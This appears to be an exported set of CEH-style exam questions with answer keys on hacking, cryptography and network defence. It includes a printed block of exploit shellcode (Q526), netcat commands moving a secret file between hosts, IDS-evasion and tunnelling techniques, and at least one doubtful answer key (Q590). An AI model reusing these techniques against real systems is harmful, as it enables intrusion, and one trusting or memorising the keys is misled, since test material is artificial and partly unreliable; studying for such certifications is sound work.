590 Gerald is a Certified Ethical Hacker working for a large financial institution in Oklahoma City. Gerald is currently performing an annual security audit of the company's network. One of the company's primary concerns is how the corporate data is transferred back and forth from the banks all over the city to the data warehouse at the company's home office. To see what type of traffic is being passed back and forth and to see how secure that data really is, Gerald uses a session hijacking tool to intercept traffic between a server and a client. Gerald hijacks an HTML session between a client running a web application which connects to a SQL database at the home office. Gerald does not kill the client's session; he simply monitors the traffic that passes between it and the server. What type of session attack is Gerald employing here? A. He is utilizing a passive network level hijack to see the session traffic used to communicate between the two devices B. Gerald is using a passive application level hijack to monitor the client and server traffic C. This type of attack would be considered an active application attack since he is actively monitoring the traffic D. This type of hijacking attack is called an active network attack

C Explanation: Session Hijacking is an active attack

578 Stephanie works as a records clerk in a large office building in downtown Chicago. On Monday, she went to a mandatory security awareness class (Security5) put on by her company's IT department. During the class, the IT department informed all employees that everyone's Internet activity was thenceforth going to be monitored. Stephanie is worried that her Internet activity might give her supervisor reason to write her up, or worse get her fired. Stephanie's daily work duties only consume about four hours of her time, so she usually spends the rest of the day surfing the web. Stephanie really enjoys surfing the Internet but definitely does not want to get fired for it. 349 What should Stephanie use so that she does not get in trouble for surfing the Internet? A. Cookie Disabler B. Stealth Anonymizer C. Stealth Firefox D. Stealth IE

C Explanation: Stealth Firefox If there are times you want to surf the web without leaving a trace in your local computer, then this is the right extension for you. https://addons.mozilla.org/en-US/firefox/addon/1306

541 What is SYSKEY # of bits used for encryption? A. 40 B. 64 C. 128 D. 256

C Explanation: System Key hotfix is an optional feature which allows stronger encryption of SAM. Strong encryption protects private account information by encrypting the password data using a 128-bit cryptographically random key, known as a password encryption key. 330

559 Vulnerability mapping occurs after which phase of a penetration test? A. Host scanning B. Passive information gathering C. Analysis of host scanning D. Network level discovery

C Explanation: The order should be Passive information gathering, Network level discovery, Host scanning and Analysis of host scanning. 339

546 _____ is a type of symmetric-key encryption algorithm that transforms a fixed-length block of plaintext (unencrypted text) data into a block of ciphertext (encrypted text) data of the same length. A. Bit Cipher B. Hash Cipher C. Block Cipher D. Stream Cipher

C Explanation: A block cipher is a symmetric key cipher which operates on fixed-length groups of bits, termed blocks, with an unvarying transformation. When encrypting, a block cipher might take 332 a (for example) 128-bit block of plaintext as input, and output a corresponding 128-bit block of ciphertext.

522 Bob has a good understanding of cryptography, having worked with it for many years. Cryptography is used to secure data from specific threat, but it does not secure the application from coding errors. It can provide data privacy, integrity and enable strong 317 authentication but it cannot mitigate programming errors. What is a good example of a programming error that Bob can use to illustrate to the management that encryption will not address all of their security concerns? A. Bob can explain that a random generator can be used to derive cryptographic keys but it uses a weak seed value and it is a form of programming error. B. Bob can explain that by using passwords to derive cryptographic keys it is a form of a programming error. C. Bob can explain that a buffer overflow is an example of programming error and it is a common mistake associated with poor programming technique. D. Bob can explain that by using a weak key management technique it is a form of programming error.

C Explanation: A buffer overflow occurs when you write a set of values (usually a string of characters) into a fixed length buffer and write at least one value outside that buffer's boundaries (usually past its end). A buffer overflow can occur when reading input from the user into a buffer, but it can also occur during other kinds of processing in a program. Technically, a buffer overflow is a problem with the program's internal implementation.

514 SSL has been as the solution to a lot of common security problems. Administrator will often time make use of SSL to encrypt communications from points A to Point B. Why do you think this could be a bad idea if there is an Intrusion Detection System deployed to monitor the traffic between Point A to Point B? A. SSL is redundant if you already have IDS's in place B. SSL will trigger rules at regular interval and force the administrator to turn them off C. SSL will make the content of the packet and Intrusion Detection System are blinded D. SSL will slow down the IDS while it is breaking the encryption to see the packet content

C Explanation: An IDS will not be able to evaluate the content in the packets if it is encrypted. 312

538 Symmetric encryption algorithms are known to be fast but present great challenges on the key management side. Asymmetric encryption algorithms are slow but allow communication with a remote host without having to transfer a key out of band or in person. If we combine the strength of both crypto systems where we use the symmetric algorithm to encrypt the bulk of the data and then use the asymmetric encryption system to encrypt the symmetric key, what would this type of usage be known as? A. Symmetric system B. Combined system C. Hybrid system D. Asymmetric system

C Explanation: Because of the complexity of the underlying problems, most public-key algorithms involve operations such as modular multiplication and exponentiation, which are much more 328 computationally expensive than the techniques used in most block ciphers, especially with typical key sizes. As a result, public-key cryptosystems are commonly "hybrid" systems, in which a fast symmetric-key encryption algorithm is used for the message itself, while the relevant symmetric key is sent with the message, but encrypted using a public-key algorithm. Similarly, hybrid signature schemes are often used, in which a cryptographic hash function is computed, and only the resulting hash is digitally signed.

513 An Employee wants to bypass detection by a network-based IDS application and does not want to attack the system containing the IDS application. Which of the following strategies can the employee use to evade detection by the network based IDS application? A. Create a ping flood B. Create a SYN flood C. Create a covert network tunnel D. Create multiple false positives

C Explanation: HTTP Tunneling is a technique by which communications performed using various network protocols are encapsulated using the HTTP protocol, the network protocols in question usually belonging to the TCP/IP family of protocols. The HTTP protocol therefore acts as a wrapper for a covert channel that the network protocol being tunneled uses to communicate. The HTTP stream with its covert channel is termed a HTTP Tunnel. Very few firewalls blocks outgoing HTTP traffic.

530 Bob has a good understanding of cryptography, having worked with it for many years. Cryptography is used to secure data from specific threats but it does not secure the data from the specific threats but it does no secure the application from coding errors. It can provide data privacy; integrity and enable strong authentication but it can't mitigate programming errors. What is a good example of a programming error that Bob can use to explain to the management how encryption will not address all their security concerns? A. Bob can explain that using a weak key management technique is a form of programming error B. Bob can explain that using passwords to derive cryptographic keys is a form of a programming error C. Bob can explain that a buffer overflow is an example of programming error and it is a common mistake associated with poor programming technique D. Bob can explain that a random number generation can be used to derive cryptographic keys but it uses a weak seed value and this is a form of a programming error 323

C Explanation: In computer security and programming, a buffer overflow, or buffer overrun, is a programming error which may result in a memory access exception and program termination, or in the event of the user being malicious, a possible breach of system security.

545 How many bits encryption does SHA-1 use? A. 64 bits B. 128 bits C. 160 bits D. 256 bits

C Explanation: SHA-1 (as well as SHA-0) produces a 160-bit digest from a message with a maximum length of 264 - 1 bits, and is based on principles similar to those used by Professor Ronald L. Rivest of MIT in the design of the MD4 and MD5 message digest algorithms.

550 What are the different between SSL and S-HTTP? A. SSL operates at the network layer and S-HTTP operates at the application layer B. SSL operates at the application layer and S-HTTP operates at the network layer C. SSL operates at transport layer and S-HTTP operates at the application layer 334 D. SSL operates at the application layer and S-HTTP operates at the transport layer

C Explanation: Whereas SSL is designed to establish a secure connection between two computers, S-HTTP is designed to send individual messages securely. S-HTTP is defined in RFC 2660

504 A program that defends against a port scanner will attempt to: A. Sends back bogus data to the port scanner B. Log a violation and recommend use of security-auditing tools C. Limit access by the scanning system to publicly available ports only D. Update a firewall rule in real time to prevent the port scan from being completed

D Explanation:

520 You have been using the msadc.pl attack script to execute arbitrary commands on an NT4 web server. While it is effective, you find it tedious to perform extended functions. On further research you come across a perl script that runs the following msadc functions: What kind of exploit is indicated by this script? 316 A. A buffer overflow exploit. B. A SUID exploit. C. A SQL injection exploit. D. A chained exploit. E. A buffer under run exploit.

D Explanation:

529 Choose one of the following pseudo codes to describe this statement: If we have written 200 characters to the buffer variable, the stack should stop because it cannot hold any more data. A. If (I > 200) then exit (1) B. If (I < 200) then exit (1) C. If (I <= 200) then exit (1) D. If (I >= 200) then exit (1)

D Explanation:

544 Annie has just succeeded in stealing a secure cookie via a XSS attack. She is able to replay the cookie even while the session is valid on the server. Why do you think this is possible? 331 A. Any cookie can be replayed irrespective of the session status B. The scenario is invalid as a secure cookie cannot be replayed C. It works because encryption is performed at the network layer (layer 1 encryption) D. It works because encryption is performed at the application layer (single encryption key)

D Explanation:

588 Darren is the network administrator for Greyson & Associates, a large law firm in Houston. Darren 355 is responsible for all network functions as well as any digital forensics work that is needed. Darren is examining the firewall logs one morning and notices some unusual activity. He traces the activity target to one of the firm's internal file servers and finds that many documents on that server were destroyed. After performing some calculations, Darren finds the damage to be around $75,000 worth of lost data. Darren decides that this incident should be handled and resolved within the same day of its discovery. What incident level would this situation be classified as? A. This situation would be classified as a mid-level incident B. Since there was over $50,000 worth of loss, this would be considered a high-level incident C. Because Darren has determined that this issue needs to be addressed in the same day it was discovered, this would be considered a low-level incident D. This specific incident would be labeled as an immediate-level incident

D Explanation:

566 One of the better features of NetWare is the use of packet signature that includes cryptographic signatures. The packet signature mechanism has four levels from 0 to 3. In the list below which of the choices represent the level that forces NetWare to sign all packets? A. 0 (zero) B. 1 343 C. 2 D. 3

D Explanation: 0Server does not sign packets (regardless of the client level). 1Server signs packets if the client is capable of signing (client level is 2 or higher). 2Server signs packets if the client is capable of signing (client level is 1 or higher). 3Server signs packets and requires all clients to sign packets or logging in will fail.

592 Jason works in the sales and marketing department for a very large advertising agency located in Atlanta. Jason is working on a very important marketing campaign for his company's largest client. Before the project could be completed and implemented, a competing advertising company comes out with the exact same marketing materials and advertising, thus rendering all the work done for Jason's client unusable. Jason is questioned about this and says he has no idea how all the material ended up in the hands of a competitor. Without any proof, Jason's company cannot do anything except move on. After working on another high profile client for about a month, all the marketing and sales material again ends up in the hands of another competitor and is released to the public before Jason's company can finish the project. Once again, Jason says that he had nothing to do with it and does not know how this could have happened. Jason is given leave with pay until they can figure out what is going on. Jason's supervisor decides to go through his email and finds a number of emails that were sent to the competitors that ended up with the marketing material. The only items in the emails were attached jpg files, but nothing else. Jason's supervisor opens the picture files, but cannot find anything out of the ordinary with them. What technique has Jason most likely used? A. Stealth Rootkit Technique B. Snow Hiding Technique C. ADS Streams Technique D. Image Steganography Technique

D Explanation: 358

537 An attacker runs netcat tool to transfer a secret file between two hosts. Machine A: netcat -1 -p 1234 < secretfile 327 Machine B: netcat 192.168.3.4 > 1234 He is worried about information being sniffed on the network. How would the attacker use netcat to encrypt information before transmitting it on the wire? A. Machine A: netcat -1 -p -s password 1234 < testfile Machine B: netcat <machine A IP> 1234 B. Machine A: netcat -1 -e magickey -p 1234 < testfile Machine B: netcat <machine A IP> 1234 C. Machine A: netcat -1 -p 1234 < testfile -pw password Machine B: netcat <machine A IP> 1234 -pw password D. Use cryptcat instead of netcat.

D Explanation: Cryptcat is the standard netcat enhanced with twofish encryption with ports for WIndows NT, BSD and Linux. Twofish is courtesy of counterpane, and cryptix. A default netcat installation does not contain any cryptography support.

567 Which is the Novell Netware Packet signature level used to sign all packets ? A. 0 B. 1 C. 2 D. 3

D Explanation: Level 0 is no signature, Level 3 is communication using signature only.

594 Leonard is a systems administrator who has been tasked by his supervisor to slow down or lessen the amount of SPAM their company receives on a regular basis. SPAM being sent to company email addresses has become a large problem within the last year for them. Leonard starts by adding SPAM prevention software at the perimeter of the network. He then builds a black list, white list, turns on MX callbacks, and uses heuristics to stop the incoming SPAM. While these techniques help some, they do not prevent much of the SPAM from coming in. Leonard decides to use a technique where his mail server responds very slowly to outside connected mail servers by using multi-line SMTP responses. By responding slowly to SMTP connections, he hopes that SPAMMERS will see this and move on to easier and faster targets. What technique is Leonard trying to employ here to stop SPAM? 359 A. To stop SPAM, Leonard is using the technique called Bayesian Content Filtering B. Leonard is trying to use the Transparent SMTP Proxy technique to stop incoming SPAM C. This technique that Leonard is trying is referred to as using a Sender Policy Framework to aid in SPAM prevention D. He is using the technique called teergrubing to delay SMTP responses and hopefully stop SPAM

D Explanation: Teergrubing FAQ What does a UBE sender really need? What does he sell? A certain amount of sent E-Mails per minute. This product is called Unsolicited Bulk E-Mail. How can anyone hit an UBE sender? By destroying his working tools. What? E-Mail is sent using SMTP. For this purpose a TCP/IP connection to the MX host of the recipient is established. Usually a computer is able to hold about 65500 TCP/IP connections from/to a certain port. But in most cases it's a lot less due to limited resources. If it is possible to hold a mail connection open (i.e. several hours), the productivity of the UBE sending equipment is dramatically reduced. SMTP offers continuation lines to hold a connection open without running into timeouts. A teergrube is a modified MTA (mail transport agent) able to do this to specified senders. Incorrect answer: Sender Policy Framework (SPF) deals with allowing an organization to publish "Authorized" SMTP servers for their organization through DNS records.

575 You have installed antivirus software and you want to be sure that your AV signatures are working correctly. You don't want to risk the deliberate introduction of a live virus to test the AV software. You would like to write a harmless test virus, which is based on the European Institute for Computer Antivirus Research format that can be detected by the AV software. How should you proceed? A. Type the following code in notepad and save the file as SAMPLEVIRUS.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it. X5O!P%@AP[4\PZX54(P^)7CC)7}$SAMPLEVIRUS-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* B. Type the following code in notepad and save the file as AVFILE.COM. Your antivirus program 347 springs into action whenever you attempt to open, run or copy it. X5O!P%@AP[4\PZX54(P^)7CC)7}$AVFILE-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* C. Type the following code in notepad and save the file as TESTAV.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it. X5O!P%@AP[4\PZX54(P^)7CC)7}$TESTAV-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* D. Type the following code in notepad and save the file as EICAR.COM. Your antivirus program springs into action whenever you attempt to open, run or copy it. X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

D Explanation: The EICAR test file (official name: EICAR Standard Anti-Virus Test File) is a file, developed by the European Institute for Computer Antivirus Research, to test the response of computer antivirus (AV) programs. The rationale behind it is to allow people, companies, and AV programmers to test their software without having to use a real computer virus that could cause actual damage should the AV not respond correctly. EICAR likens the use of a live virus to test AV software to setting a fire in a trashcan to test a fire alarm, and promotes the EICAR test file as a safe alternative.

581 Stephanie, a security analyst, has just returned from a Black Hat conference in Las Vegas where she learned of many powerful tools used by hackers and security professionals alike. Stephanie is primarily worried about her Windows network because of all the legacy computers and servers that she must use, due to lack of funding. Stephanie wrote down many of the tools she learned of in her notes and was particularly interested in one tool that could scan her network for vulnerabilities and return reports on her network's weak spots called SAINT. She remembered from her notes that SAINT is very flexible and can accomplish a number of tasks. Stephanie asks her supervisor, the CIO, if she can download and run SAINT on the network. Her boss said to not bother with it since it will not work for her at all. 351 Why did Stephanie's boss say that SAINT would not work? A. SAINT only works on Macintosh-based machines B. SAINT is too expensive and is not cost effective C. SAINT is too network bandwidth intensive D. SAINT only works on LINUX and UNIX machines

D Explanation: Works with Unix/Linux/BSD and MacOS X http://www.saintcorporation.com/

501 Basically, there are two approaches to network intrusion detection: signature detection, and anomaly detection. The signature detection approach utilizes well-known signatures for network traffic to identify potentially malicious traffic. The anomaly detection approach utilizes a previous history of network traffic to search for patterns that are abnormal, which would indicate an intrusion. How can an attacker disguise his buffer overflow attack signature such that there is a greater probability of his attack going undetected by the IDS? A. He can use a shellcode that will perform a reverse telnet back to his machine B. He can use a dynamic return address to overwrite the correct value in the target machine computer memory C. He can chain NOOP instructions into a NOOP "sled" that advances the processor's instruction pointer to a random place of choice D. He can use polymorphic shell code-with a tool such as ADMmutate - to change the signature of his exploit as seen by a network IDS

D Explanation: ADMmutate is using a polymorphic technique designed to circumvent certain forms of signature based intrusion detection. All network based remote buffer overflow exploits have similarities in how they function. ADMmutate has the ability to emulate the protocol of the service the attacker is attempting to exploit. The data payload (sometimes referred to as an egg) contains the instructions the attacker wants to execute on the target machine. These eggs are generally 304 interchangeable and can be utilized in many different buffer overflow exploits. ADMmutate uses several techniques to randomize the contents of the egg in any given buffer overflow exploit. This randomization effectively changes the content or 'signature' of the exploit without changing the functionality of the exploit.

572 Which of the following is NOT a valid NetWare access level? A. Not Logged in B. Logged in C. Console Access D. Administrator

D Explanation: Administrator is an account not a access level.

543 Which of the following best describes session key creation in SSL? A. It is created by the server after verifying theuser's identity B. It is created by the server upon connection by the client C. It is created by the client from the server's public key D. It is created by the client after verifying the server's identity

D Explanation: An SSL session always begins with an exchange of messages called the SSL handshake. The handshake allows the server to authenticate itself to the client using public-key techniques, then allows the client and the server to cooperate in the creation of symmetric keys used for rapid encryption, decryption, and tamper detection during the session that follows. Optionally, the handshake also allows the client to authenticate itself to the server.

503 John has a proxy server on his network which caches and filters web access. He shuts down all unnecessary ports and services. Additionally, he has installed a firewall (Cisco PIX) that will not allow users to connect to any outbound ports. Jack, a network user has successfully connected to a remote server on port 80 using netcat. He could in turn drop a shell from the remote machine. Assuming an attacker wants to penetrate John's network, which of the following options is he likely to choose? A. Use ClosedVPN B. Use Monkey shell C. Use reverse shell using FTP protocol D. Use HTTPTunnel or Stunnel on port 80 and 443 305

D Explanation: As long as you allow http or https traffic attacks can be tunneled over those protocols with Stunnel or HTTPTunnel.

542 Which of the following is NOT true of cryptography? A. Science of protecting information by encoding it into an unreadable format B. Method of storing and transmitting data in a form that only those it is intended for can read and process C. Most (if not all) algorithms can be broken by both technical and non-technical means D. An effective way of protecting sensitive information in storage but not in transit

D Explanation: Cryptography will protect data in both storage and in transit.

510 What is the purpose of firewalking? A. It's a technique used to discover Wireless network on foot B. It's a technique used to map routers on a network link C. It's a technique used to discover interface in promiscuous mode D. It's a technique used to discover what rules are configured on a gateway

D Explanation: Firewalking uses a traceroute-like IP packet analysis to determine whether or not a particular packet can pass from the attacker's host to a destination host through a packet-filtering device. This technique can be used to map 'open' or 'pass through' ports on a gateway. More over, it can determine whether packets with various control information can pass through a given gateway.

502 You are the security administrator for a large network. You want to prevent attackers from running any sort of traceroute into your DMZ and discovering the internal structure of publicly accessible areas of the network. How can you achieve this? A. Block TCP at the firewall B. Block UDP at the firewall C. Block ICMP at the firewall D. There is no way to completely block tracerouting into this area

D Explanation: If you create rules that prevents attackers to perform traceroutes to your DMZ then you'll also prevent anyone from accessing the DMZ from outside the company network and in that case it is not a DMZ you have.

516 Bob has set up three web servers on Windows Server 2003 IIS 6.0. Bob has followed all the recommendations for securing the operating system and IIS. These servers are going to run numerous e-commerce websites that are projected to bring in thousands of dollars a day. Bob is still concerned about the security of this server because of the potential for financial loss. Bob has asked his company's firewall administrator to set the firewall to inspect all incoming traffic on ports 80 and 443 to ensure that no malicious data is getting into the network. 313 Why will this not be possible? A. Firewalls can't inspect traffic coming through port 443 B. Firewalls can only inspect outbound traffic C. Firewalls can't inspect traffic coming through port 80 D. Firewalls can't inspect traffic at all, they can only block or allow certain ports

D Explanation: In order to really inspect traffic and traffic patterns you need an IDS.

540 In the context of using PKI, when Sven wishes to send a secret message to Bob, he looks up Bob's public key in a directory, uses it to encrypt the message before sending it off. Bob then uses his private key to decrypt the message and reads it. No one listening on can 329 decrypt the message. Anyone can send an encrypted message to Bob but only Bob can read it. Thus, although many people may know Bob's public key and use it to verify Bob's signature, they cannot discover Bob's private key and use it to forge digital signatures. What does this principle refer to? A. Irreversibility B. Non-repudiation C. Symmetry D. Asymmetry

D Explanation: PKI uses asymmetric key pair encryption. One key of the pair is the only way to decrypt data encrypted with the other.

555 Which of the following encryption is not based on Block Cipher? A. DES B. Blowfish C. AES D. RC4

D Explanation: RC4 (also known as ARC4 or ARCFOUR) is the most widely-used software stream cipher and is used in popular protocols such as Secure Sockets Layer (SSL) (to protect Internet 337 traffic) and WEP (to secure wireless networks). Topic 22, Penetration Testing Methodologies

539 Steven the hacker realizes that the network administrator of company is using syskey to protect organization resources in the Windows 2000 Server. Syskey independently encrypts the hashes so that physical access to the server, tapes, or ERDs is only first step to cracking the passwords. Steven must break through the encryption used by syskey before he can attempt to brute force dictionary attacks on the hashes. Steven runs a program called "SysCracker" targeting the Windows 2000 Server machine in attempting to crack the hash used by Syskey. He needs to configure the encryption level before he can launch attach. How many bits does Syskey use for encryption? A. 40 bit B. 64 bit C. 256 bit D. 128 bit

D Explanation: SYSKEY is a utility that encrypts the hashed password information in a SAM database using a 128-bit encryption key.

564 Jim was having no luck performing a penetration test on his company's network. He was running the test from home and had downloaded every security scanner he could lay his hands on. Despite knowing the IP range of all of the systems and the exact network configuration, Jim was unable to get any useful results. Why is Jim having these problems? A. Security scanners can't perform vulnerability linkage B. Security Scanners are not designed to do testing through a firewall C. Security Scanners are only as smart as their database and can't find unpublished vulnerabilities D. All of the above

D Explanation: Security scanners are designed to find vulnerabilities but not to use them, also they will only find well known vulnerabilities that and no zero day exploits. Therefore you can't use a security scanner for penetration testing but need a more powerful program. 342

560 Why would you consider sending an email to an address that you know does not exist within the company you are performing a Penetration Test for? A. To determine who is the holder of the root account B. To perform a DoS C. To create needless SPAM D. To illicit a response back that will reveal information about email servers and how they treat undeliverable mail E. To test for virus protection

D Explanation: Sending a bogus email is one way to find out more about internal servers. Also, to gather additional IP addresses and learn how they treat mail.

523 A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) then it was intended to hold. What is the most common cause of buffer overflow in software today? A. Bad permissions on files. B. High bandwidth and large number of users. C. Usage of non standard programming languages. D. Bad quality assurance on software produced.

D Explanation: Technically, a buffer overflow is a problem with the program's internal 318 implementation.

506 306 Exhibit: Given the following extract from the snort log on a honeypot, what do you infer from the attack? A. A new port was opened B. A new user id was created C. The exploit was successful D. The exploit was not successful

D Explanation: The attacker submits a PASS to the honeypot and receives a login incorrect before disconnecting.

524 While investigating a claim of a user downloading illegal material, the investigator goes through the files on the suspect's workstation. He comes across a file that is called 'file.txt' but when he opens it, he find the following: What does this file contain? A. A picture that has been renamed with a .txt extension. B. An encrypted file. C. A uuencoded file. D. A buffer overflow.

D Explanation: This is a buffer overflow exploit with its "payload" in hexadecimal format.

570 Pandora is used to attack __________ network operating systems. A. Windows B. UNIX C. Linux D. Netware E. MAC OS

D Explanation: While there are not lots of tools available to attack Netware, Pandora is one that can be used. 345

598 Steven is the senior network administrator for Onkton Incorporated, an oil well drilling company in Oklahoma City. Steven and his team of IT technicians are in charge of keeping inventory for the entire company; including computers, software, and oil well equipment. To keep track of everything, Steven has decided to use RFID tags on their entire inventory so they can be scanned with either a wireless scanner or a handheld scanner. These RFID tags hold as much information as possible about the equipment they are attached to. When Steven purchased these tags, he made sure they were as state of the art as possible. One feature he really liked was the ability to disable RFID tags if necessary. This comes in very handy when the company actually sells oil drilling equipment to other companies. All Steven has to do is disable the RFID tag on the sold equipment and it cannot give up any information that was previously stored on it. What technology allows Steven to disable the RFID tags once they are no longer needed? A. Newer RFID tags can be disabled by using Terminator Switches built into the chips B. RFID Kill Switches built into the chips enable Steven to disable them C. The company's RFID tags can be disabled by Steven using Replaceable ROM technology D. The technology used to disable an RFIP chip after it is no longer needed, or possibly stolen, is called RSA Blocking

D Explanation: http://www.rsa.com/rsalabs/node.asp?id=2060

587 This is an authentication method in which is used to prove that a party knows a password without transmitting the password in any recoverable form over a network. This authentication is secure because the password is never transmitted over the network, even in hashed form; only a random number and an encrypted random number are sent. A. Realm Authentication B. SSL Authentication C. Basic Form Authentication D. Cryptographic Authentication E. Challenge/Response Authentication

E Explanation: Challenge-Response Authentication The secure Challenge-Response Authentication Mechanism (CRAM-MD5) avoids passing a cleartext password over the network when you access your email account, ensuring that your login details cannot be captured and used by anyone in transit. http://www.neomailbox.com/component/content/article/212-hardware-token-authentication

526 #define MAKE_STR_FROM_RET(x) ((x)&0xff), (((x)&0xff00)8), (((x)&0xff0000)16), (((x)&0xff000000)24) char infin_loop[]= /* for testing purposes */ "\xEB\xFE"; 320 char bsdcode[] = /* Lam3rZ chroot() code rewritten for FreeBSD by venglin */ "\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43" "\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0" "\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0" "\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80" "\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9" "\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75" "\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd" "\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46" "\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56" "\x0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53" "\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\x01\xff\xff\x30" "\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e" "\x67\x6c\x69\x6e";static int magic[MAX_MAGIC],magic_d[MAX_MAGIC]; static char *magic_str=NULL; int before_len=0; char *target=NULL, *username="user", *password=NULL; struct targets getit; The following exploit code is extracted from what kind of attack? A. Remote password cracking attack B. SQL Injection C. Distributed Denial of Service D. Cross Site Scripting E. Buffer Overflow

E Explanation: This is a buffer overflow with it's payload in hex format. 321